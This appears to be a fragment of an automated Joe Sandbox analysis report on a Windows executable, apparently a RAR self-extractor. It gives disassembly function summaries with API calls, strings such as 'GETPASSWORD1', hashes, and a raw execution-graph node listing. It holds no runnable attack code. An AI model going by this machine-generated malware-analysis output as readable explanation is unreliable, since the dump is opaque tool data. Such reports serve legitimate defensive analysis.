                                              • Opcode Fuzzy Hash: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                              • Instruction Fuzzy Hash: C2518C75E0020AAFDF14DFA9C881EADBBB5EF49310F28416DE854E7342E7319E029B50
                                              APIs
                                                • Part of subcall function 00CA79F7: GetSystemTime.KERNEL32(?,00000000), ref: 00CA7A0F
                                                • Part of subcall function 00CA79F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA7A1D
                                                • Part of subcall function 00CA79A0: __aulldiv.LIBCMT ref: 00CA79A9
                                              • __aulldiv.LIBCMT ref: 00C9F162
                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,9CAA5719,?,?,00000000,?,00000000,00CC9F3D,000000FF), ref: 00C9F169
                                                • Part of subcall function 00C91150: _wcslen.LIBCMT ref: 00C9115B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                              • String ID: .rartemp
                                              • API String ID: 3789791499-2558811017
                                              • Opcode ID: 536aada48b49475505428998e911641e992ce61f9632d603a1c1c6ee462cd710
                                              • Instruction ID: 719d07badb77fc724dabec8cad464ea696a654fd4bea4a7dfb305d6c8334c074
                                              • Opcode Fuzzy Hash: 536aada48b49475505428998e911641e992ce61f9632d603a1c1c6ee462cd710
                                              • Instruction Fuzzy Hash: D8416071900249AFDF14EFA4CC8AFEE77A9EF54350F444129F91593282EB349B49DA60
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CADAD5
                                                • Part of subcall function 00CA0360: __EH_prolog3.LIBCMT ref: 00CA0367
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID: Shell.Explorer$about:blank
                                              • API String ID: 431132790-874089819
                                              • Opcode ID: 4651a827269c29fa64257009986071ad5eadd5df7378e9cf501a069ebea6df77
                                              • Instruction ID: 024b4da9ee0069d6046c5579b569464e0569498bcb97933596c999c8b51c3a53
                                              • Opcode Fuzzy Hash: 4651a827269c29fa64257009986071ad5eadd5df7378e9cf501a069ebea6df77
                                              • Instruction Fuzzy Hash: 9A417F70700202DFDB08DF64D895B6A77B5BF8A708F15846DE907AF6A1DB70AD00DBA1
                                              APIs
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • EndDialog.USER32(?,00000001), ref: 00CB017B
                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CB01B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ItemText$DialogWindow
                                              • String ID: GETPASSWORD1
                                              • API String ID: 445417207-3292211884
                                              • Opcode ID: 76a6a88bc007fd624d310349d73f4237f2f0698bdb249e1d7e1efbd0f4447a6e
                                              • Instruction ID: d9112f72ac8ffb1405f90dca489a08b6c2f693ed2bc7f800b04bd1aaaa18d73d
                                              • Opcode Fuzzy Hash: 76a6a88bc007fd624d310349d73f4237f2f0698bdb249e1d7e1efbd0f4447a6e
                                              • Instruction Fuzzy Hash: 361127B26443447BD2349B289C89FFF77ACEB86701F100429F755E7190C734A94186B5
                                              APIs
                                                • Part of subcall function 00CA5094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CA50B3
                                                • Part of subcall function 00CA5094: GetProcAddress.KERNEL32(00CE51F8,CryptUnprotectMemory), ref: 00CA50C3
                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,00CA5104), ref: 00CA5197
                                              Strings
                                              • CryptUnprotectMemory failed, xrefs: 00CA518F
                                              • CryptProtectMemory failed, xrefs: 00CA514E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AddressProc$CurrentProcess
                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                              • API String ID: 2190909847-396321323
                                              • Opcode ID: 96a834c2c5ab45912dfe3a7651b60143b5d7ef836b7090e9fa15df0a3359c3c2
                                              • Instruction ID: 1ffbd8e40c109695dfe11e43762cf926fe8856f03b68803e80895827fcc64aff
                                              • Opcode Fuzzy Hash: 96a834c2c5ab45912dfe3a7651b60143b5d7ef836b7090e9fa15df0a3359c3c2
                                              • Instruction Fuzzy Hash: 0E112672A01A26ABDF119F24DC81B7E3B65FF01768B00C119FE255F251D7309E0286D4
                                              APIs
                                              • IsWindowVisible.USER32(00010464), ref: 00CB4291
                                              • DialogBoxParamW.USER32(GETPASSWORD1,00010464,00CB0110,?), ref: 00CB42BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: DialogParamVisibleWindow
                                              • String ID: GETPASSWORD1
                                              • API String ID: 3157717868-3292211884
                                              • Opcode ID: b76e599620d2309e38a8fcfdf2a19e1fae09ca5e89893a3e00979997615ec236
                                              • Instruction ID: eeb45e9391c9de7bb4e60b2e086204d9f0778c2a17edf5d832ec336804017b26
                                              • Opcode Fuzzy Hash: b76e599620d2309e38a8fcfdf2a19e1fae09ca5e89893a3e00979997615ec236
                                              • Instruction Fuzzy Hash: C3012D30699794BFCF14AB65DC56FEF37C8AB02314F054125F811971A2CAB09844EB62
                                              APIs
                                                • Part of subcall function 00CA3EAA: _swprintf.LIBCMT ref: 00CA3EEA
                                                • Part of subcall function 00CA3EAA: _strlen.LIBCMT ref: 00CA3F0B
                                                • Part of subcall function 00CA3EAA: SetDlgItemTextW.USER32(?,00CD919C,?), ref: 00CA3F64
                                                • Part of subcall function 00CA3EAA: GetWindowRect.USER32(?,?), ref: 00CA3F9A
                                                • Part of subcall function 00CA3EAA: GetClientRect.USER32(?,?), ref: 00CA3FA6
                                              • GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                              • SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                              • String ID: 0
                                              • API String ID: 2622349952-4108050209
                                              • Opcode ID: 72020954498ebb5182985a07d79b94e8e2a1c1aa8f19c74e753516b3f61e45de
                                              • Instruction ID: 28911e3f7942b648453aeab4c5197e47ece530ab063f8ef07025b612a5d43af8
                                              • Opcode Fuzzy Hash: 72020954498ebb5182985a07d79b94e8e2a1c1aa8f19c74e753516b3f61e45de
                                              • Instruction Fuzzy Hash: CEF0A430A84389A6DF161F62DD0FBEE3B58AF05304F084255FD58582E1C774C750EB50
                                              APIs
                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CB5379
                                                • Part of subcall function 00CB52FB: std::exception::exception.LIBCONCRT ref: 00CB5308
                                                • Part of subcall function 00CB734A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00CB536C,?,00CD6C54,?), ref: 00CB73AA
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB539F
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ExceptionRaise$AccessDloadHelper2@8LoadReleaseSectionWrite___delaystd::exception::exceptionstd::invalid_argument::invalid_argument
                                              • String ID: @Ut
                                              • API String ID: 1552410523-141846247
                                              • Opcode ID: a1c199c75cd9cc2fcea470032b210b05bf5e9260fca79da79942b80c9283d1e8
                                              • Instruction ID: 245ec5903c4772d367dc18ca1e4cc2edc8d1c726b3bd6c69705f3639375dc227
                                              • Opcode Fuzzy Hash: a1c199c75cd9cc2fcea470032b210b05bf5e9260fca79da79942b80c9283d1e8
                                              • Instruction Fuzzy Hash: B6D05BA991C20CBA9B04B6D1DC06DFD376CD940700F504527FA41D2592EAB0951455A1
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,00CA770A,?,?,00CA777F,?,?,?,?,?,00CA7769), ref: 00CA75F3
                                              • GetLastError.KERNEL32(?,?,00CA777F,?,?,?,?,?,00CA7769), ref: 00CA75FF
                                                • Part of subcall function 00C992EB: __EH_prolog3_GS.LIBCMT ref: 00C992F2
                                              Strings
                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CA7608
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorH_prolog3_LastObjectSingleWait
                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                              • API String ID: 2419225763-2248577382
                                              • Opcode ID: ecbdedc9fa58de3772ecbbdd390195fad421860fa735958945616aeba671fa8a
                                              • Instruction ID: 8ab2eda5e870abfea7c86e52f3f9da48e2dff2242d63f7716239e24e2c194b14
                                              • Opcode Fuzzy Hash: ecbdedc9fa58de3772ecbbdd390195fad421860fa735958945616aeba671fa8a
                                              • Instruction Fuzzy Hash: CFD05E71908821B7DA1033A89C4EFAE7905DB12330F600728F639652E5DA20094292AD
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,9CAA5719), ref: 00CA3E65
                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00CA3E73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FindHandleModuleResource
                                              • String ID: RTL
                                              • API String ID: 3537982541-834975271
                                              • Opcode ID: e9596bf094e05c1ec3b03524c6b0ca8cfe7c06036999f95c1ea3837d3491d862
                                              • Instruction ID: 6c3f38054e38cb0532c9fbbbb7a00d1b7f2d442fe4ad8f7afcda8166d28f9154
                                              • Opcode Fuzzy Hash: e9596bf094e05c1ec3b03524c6b0ca8cfe7c06036999f95c1ea3837d3491d862
                                              • Instruction Fuzzy Hash: CCC0807174035096E7301771FC8DF472D585B05715F05045CF90D994C0D5E5D8418BD0

                                              Execution Graph

                                              Execution Coverage:3.5%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:2.9%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:49
98468->98476 98477 e8c34b 8 API calls 98468->98477 98479 e8d8c1 ISource 98468->98479 98471->98468 98501 ee55d9 8 API calls ISource 98473->98501 98476->98468 98477->98468 98478 e8d95c ISource 98480 e8d973 98478->98480 98496 e9e284 8 API calls ISource 98478->98496 98479->98478 98488 e8c34b 98479->98488 98485 e8c2dd 98481->98485 98482 e8c2e5 98482->98466 98483 ea016b 8 API calls 98483->98485 98484 e8bf07 8 API calls 98484->98485 98485->98482 98485->98483 98485->98484 98486 e8c2cd 8 API calls 98485->98486 98487 e8be6d 8 API calls 98485->98487 98486->98485 98487->98485 98489 e8c359 98488->98489 98495 e8c381 ISource 98488->98495 98490 e8c367 98489->98490 98491 e8c34b 8 API calls 98489->98491 98492 e8c36d 98490->98492 98493 e8c34b 8 API calls 98490->98493 98491->98490 98494 e8c780 8 API calls 98492->98494 98492->98495 98493->98492 98494->98495 98495->98478 98496->98478 98497->98454 98498->98458 98499->98467 98500->98467 98501->98474 98502 e90e6f 98503 e90e83 98502->98503 98509 e913d5 98502->98509 98504 e90e95 98503->98504 98505 ea016b 8 API calls 98503->98505 98506 ed55d0 98504->98506 98507 e8b3fe 8 API calls 98504->98507 98508 e90eee 98504->98508 98505->98504 98606 ef1a29 8 API calls 98506->98606 98507->98504 98514 e9044d ISource 98508->98514 98535 e92ad0 98508->98535 98509->98504 98512 e8be6d 8 API calls 98509->98512 98512->98504 98513 ed62cf 98610 ef3ef6 81 API calls __wsopen_s 98513->98610 98515 e91645 98515->98514 98522 e8be6d 8 API calls 98515->98522 98517 ea016b 8 API calls 98533 e90326 ISource 98517->98533 98519 ed61fe 98609 ef3ef6 81 API calls __wsopen_s 98519->98609 98520 e8be6d 8 API calls 98520->98533 98521 ed5c7f 98521->98514 98526 e8be6d 8 API calls 98521->98526 98522->98514 98526->98514 98527 ea05d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98527->98533 98528 e8bf07 8 API calls 98528->98533 98529 ea0433 29 API calls pre_c_initialization 98529->98533 98530 ed60b9 98607 ef3ef6 81 API calls 
__wsopen_s 98530->98607 98532 e90a5e ISource 98608 ef3ef6 81 API calls __wsopen_s 98532->98608 98533->98513 98533->98514 98533->98515 98533->98517 98533->98519 98533->98520 98533->98521 98533->98527 98533->98528 98533->98529 98533->98530 98533->98532 98534 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98533->98534 98604 e91940 253 API calls 2 library calls 98533->98604 98605 e91e00 40 API calls ISource 98533->98605 98534->98533 98536 e92f70 98535->98536 98537 e92b36 98535->98537 98951 ea05d2 5 API calls __Init_thread_wait 98536->98951 98539 ed7b7c 98537->98539 98540 e92b50 98537->98540 98955 f079f9 253 API calls 98539->98955 98611 e930e0 98540->98611 98542 e92f7a 98545 e92fbb 98542->98545 98547 e8b25f 8 API calls 98542->98547 98544 ed7b88 98544->98533 98550 ed7b91 98545->98550 98552 e92fec 98545->98552 98556 e92f94 98547->98556 98548 e930e0 9 API calls 98549 e92b76 98548->98549 98549->98545 98551 e92bac 98549->98551 98956 ef3ef6 81 API calls __wsopen_s 98550->98956 98551->98550 98575 e92bc8 __fread_nolock 98551->98575 98553 e8b3fe 8 API calls 98552->98553 98555 e92ff9 98553->98555 98953 e9e662 253 API calls 98555->98953 98952 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98556->98952 98558 ed7bb9 98957 ef3ef6 81 API calls __wsopen_s 98558->98957 98561 e92cef 98562 ed7c1c 98561->98562 98563 e92cfc 98561->98563 98959 f060a2 53 API calls _wcslen 98562->98959 98564 e930e0 9 API calls 98563->98564 98566 e92d09 98564->98566 98570 ed7d45 98566->98570 98572 e930e0 9 API calls 98566->98572 98567 ea016b 8 API calls 98567->98575 98568 e93032 98954 e9fe59 8 API calls 98568->98954 98569 ea019b 8 API calls 98569->98575 98580 ed7bb4 98570->98580 98960 ef3ef6 81 API calls __wsopen_s 98570->98960 98578 e92d23 98572->98578 98574 e902f0 253 API calls 98574->98575 98575->98555 98575->98558 98575->98561 98575->98567 98575->98569 98575->98574 98576 ed7bfd 98575->98576 98575->98580 98958 ef3ef6 81 API calls __wsopen_s 
98576->98958 98577 e92d87 ISource 98577->98568 98577->98570 98577->98580 98582 e930e0 9 API calls 98577->98582 98585 e92e3b ISource 98577->98585 98601 e87953 CloseHandle 98577->98601 98621 f0cd16 98577->98621 98710 ef276a 98577->98710 98714 ef6561 98577->98714 98721 eee9c5 GetFileAttributesW 98577->98721 98723 f0eb63 98577->98723 98759 ef65b4 98577->98759 98764 e9be75 98577->98764 98821 ef5ed5 98577->98821 98851 efde5d 98577->98851 98856 f09eea 98577->98856 98859 e9f95e 98577->98859 98866 ef8e39 98577->98866 98885 ef95f6 98577->98885 98900 f0ac49 98577->98900 98905 ef4ad5 98577->98905 98910 ef874a 98577->98910 98937 ef6d2d 98577->98937 98578->98570 98578->98577 98581 e8be6d 8 API calls 98578->98581 98580->98533 98581->98577 98582->98577 98583 e92edd 98583->98533 98585->98583 98950 e9e29c 8 API calls ISource 98585->98950 98601->98577 98604->98533 98605->98533 98606->98514 98607->98532 98608->98514 98609->98514 98610->98514 98612 e93121 98611->98612 98616 e930fd 98611->98616 98961 ea05d2 5 API calls __Init_thread_wait 98612->98961 98614 e9312b 98614->98616 98962 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98614->98962 98620 e92b60 98616->98620 98963 ea05d2 5 API calls __Init_thread_wait 98616->98963 98617 e99ec7 98617->98620 98964 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98617->98964 98620->98548 98622 e8bf07 8 API calls 98621->98622 98623 f0cd39 98622->98623 98624 e8bf07 8 API calls 98623->98624 98625 f0cd42 98624->98625 98626 e8bf07 8 API calls 98625->98626 98627 f0cd4b 98626->98627 98637 f0cdda 98627->98637 98965 e88e70 98627->98965 98631 f0cda5 99014 f0d2f7 98631->99014 98633 f0cdd6 98634 f0ce0f RegConnectRegistryW 98633->98634 98635 f0ce76 RegCreateKeyExW 98633->98635 98633->98637 98634->98635 98634->98637 98638 f0cf0e 98635->98638 98644 f0cead 98635->98644 98637->98577 98639 f0d1d6 RegCloseKey 98638->98639 98641 e88e70 52 API calls 98638->98641 98639->98637 98640 f0d1e9 RegCloseKey 98639->98640 98640->98637 
98642 f0cf29 98641->98642 98643 ea4db8 _strftime 40 API calls 98642->98643 98645 f0cf38 98643->98645 98644->98637 98649 f0ceff RegCloseKey 98644->98649 98646 f0cf44 98645->98646 98647 f0cf96 98645->98647 98648 e88e70 52 API calls 98646->98648 98650 e88e70 52 API calls 98647->98650 98651 f0cf4e _wcslen 98648->98651 98649->98637 98652 f0cfa0 98650->98652 98655 e88e70 52 API calls 98651->98655 98653 ea4db8 _strftime 40 API calls 98652->98653 98654 f0cfaf 98653->98654 98656 f0d047 98654->98656 98657 f0cfbf 98654->98657 98658 f0cf70 98655->98658 98659 e88e70 52 API calls 98656->98659 98660 e88e70 52 API calls 98657->98660 98661 e88e70 52 API calls 98658->98661 98662 f0d051 98659->98662 98663 f0cfc9 _wcslen 98660->98663 98709 f0cf85 98661->98709 98664 ea4db8 _strftime 40 API calls 98662->98664 98669 e88e70 52 API calls 98663->98669 98666 f0d060 98664->98666 98665 f0d2bb RegSetValueExW 98665->98639 98679 f0d01f 98665->98679 98667 f0d070 98666->98667 98668 f0d156 98666->98668 98670 e88e70 52 API calls 98667->98670 98672 e88e70 52 API calls 98668->98672 98671 f0cfeb 98669->98671 98673 f0d07a 98670->98673 98674 e88e70 52 API calls 98671->98674 98675 f0d160 98672->98675 98676 ea019b 8 API calls 98673->98676 98677 f0d000 RegSetValueExW 98674->98677 98678 ea4db8 _strftime 40 API calls 98675->98678 98680 f0d09f 98676->98680 98677->98639 98677->98679 98681 f0d16f 98678->98681 98679->98639 98682 e88e70 52 API calls 98680->98682 98683 f0d215 98681->98683 98684 f0d17f 98681->98684 98696 f0d0b4 98682->98696 98685 e88e70 52 API calls 98683->98685 99024 e8c92d 98684->99024 98688 f0d21f 98685->98688 98687 f0d187 98689 e88e70 52 API calls 98687->98689 98690 ea4db8 _strftime 40 API calls 98688->98690 98691 f0d198 RegSetValueExW 98689->98691 98692 f0d22e 98690->98692 98691->98639 98691->98679 98694 f0d265 98692->98694 98695 f0d23a 98692->98695 98700 e88e70 52 API calls 98694->98700 99029 e8c5df 39 API calls 98695->99029 98697 e88e70 52 API calls 98696->98697 98698 f0d106 RegSetValueExW 
98697->98698 98698->98679 98702 f0d26f 98700->98702 98701 f0d242 98703 e88e70 52 API calls 98701->98703 98704 ea4db8 _strftime 40 API calls 98702->98704 98703->98691 98705 f0d27e 98704->98705 98705->98679 98706 ef276a 10 API calls 98705->98706 98707 f0d296 98706->98707 98708 e88e70 52 API calls 98707->98708 98708->98709 98709->98665 98711 ef2773 98710->98711 98713 ef2778 98710->98713 99035 ef183b 98711->99035 98713->98577 98715 e88e70 52 API calls 98714->98715 98716 ef6577 98715->98716 99060 eedb69 98716->99060 98718 ef657f 98719 ef6598 98718->98719 98720 ef6583 GetLastError 98718->98720 98719->98577 98720->98719 98722 eee9d1 98721->98722 98722->98577 98724 e8bf07 8 API calls 98723->98724 98725 f0eb7a 98724->98725 98726 e88e70 52 API calls 98725->98726 98727 f0eb89 98726->98727 99085 e87a14 98727->99085 98730 e88e70 52 API calls 98731 f0eba9 98730->98731 98732 f0ebc1 98731->98732 98733 f0ec26 98731->98733 98734 e8c92d 39 API calls 98732->98734 98735 e88e70 52 API calls 98733->98735 98737 f0ebc6 98734->98737 98736 f0ec2b 98735->98736 98738 f0ec73 98736->98738 98739 f0ec38 98736->98739 98737->98739 98741 f0ebdf 98737->98741 98742 f0ec8b 98738->98742 98744 e8c92d 39 API calls 98738->98744 99109 e86ab6 98739->99109 98743 e88685 8 API calls 98741->98743 98745 f0eca4 98742->98745 98748 e8c92d 39 API calls 98742->98748 98747 f0ebec 98743->98747 98744->98742 98746 e8be6d 8 API calls 98745->98746 98749 f0ecbe 98746->98749 98750 e87af4 8 API calls 98747->98750 98748->98745 99090 ee9b57 98749->99090 98753 f0ebfa 98750->98753 98752 f0ec45 98752->98577 98755 e88685 8 API calls 98753->98755 98754 f0ec21 99123 e87a59 98754->99123 98756 f0ec13 98755->98756 98757 e87af4 8 API calls 98756->98757 98757->98754 98760 e88e70 52 API calls 98759->98760 98761 ef65c7 98760->98761 99136 eee387 lstrlenW 98761->99136 98763 ef65d1 98763->98577 98765 e86ab6 8 API calls 98764->98765 98766 e9be8d 98765->98766 98767 ea016b 8 API calls 98766->98767 98772 ed8f7a 98766->98772 98769 e9bea6 98767->98769 
98770 ea019b 8 API calls 98769->98770 98773 e9beb7 98770->98773 98771 e9bf1f 98776 e8c92d 39 API calls 98771->98776 98780 e9bf2c 98771->98780 98772->98771 99159 efa607 39 API calls 98772->99159 98774 e87953 CloseHandle 98773->98774 98775 e9bec2 98774->98775 98777 e8bf07 8 API calls 98775->98777 98778 ed8fdc 98776->98778 98779 e9beca 98777->98779 98778->98780 98781 ed8fe4 98778->98781 98782 e87953 CloseHandle 98779->98782 98783 e9fdc9 3 API calls 98780->98783 98784 e8c92d 39 API calls 98781->98784 98785 e9bed1 98782->98785 98789 e9bf33 98783->98789 98784->98789 98786 e88e70 52 API calls 98785->98786 98787 e9bedd 98786->98787 98788 e87953 CloseHandle 98787->98788 98790 e9bee7 98788->98790 98791 ed8ff9 98789->98791 98792 e9bf4e 98789->98792 98795 e86e52 5 API calls 98790->98795 98794 ea019b 8 API calls 98791->98794 98793 e87a14 8 API calls 98792->98793 98797 e9bf56 98793->98797 98798 ed8ffe 98794->98798 98796 e9bef8 98795->98796 98799 e9bf00 98796->98799 98800 ed8f72 98796->98800 99141 e9bfbc 98797->99141 98802 ed9012 98798->98802 98804 e841c9 2 API calls 98798->98804 98807 e86b12 13 API calls 98799->98807 99158 e87923 CloseHandle ISource 98800->99158 98810 ed9016 __fread_nolock 98802->98810 99160 ef1759 8 API calls ___scrt_fastfail 98802->99160 98803 e9bf65 98808 e87a59 8 API calls 98803->98808 98803->98810 98804->98802 98809 e9bf0e 98807->98809 98814 e9bf79 98808->98814 99155 e86afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 98809->99155 98812 e9bf15 98812->98771 98813 ed8f3b 98812->98813 99157 eed4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98813->99157 98815 e9bfb3 98814->98815 98816 e87953 CloseHandle 98814->98816 98815->98577 98818 e9bfa7 98816->98818 98818->98815 99156 e87923 CloseHandle ISource 98818->99156 98819 ed8f52 98819->98771 98822 ef5fbd 98821->98822 98823 ef5ef4 98821->98823 98825 e88e70 52 API calls 98822->98825 98834 ef6011 98822->98834 98824 e8c92d 39 API calls 98823->98824 98826 ef5eff 98824->98826 98827 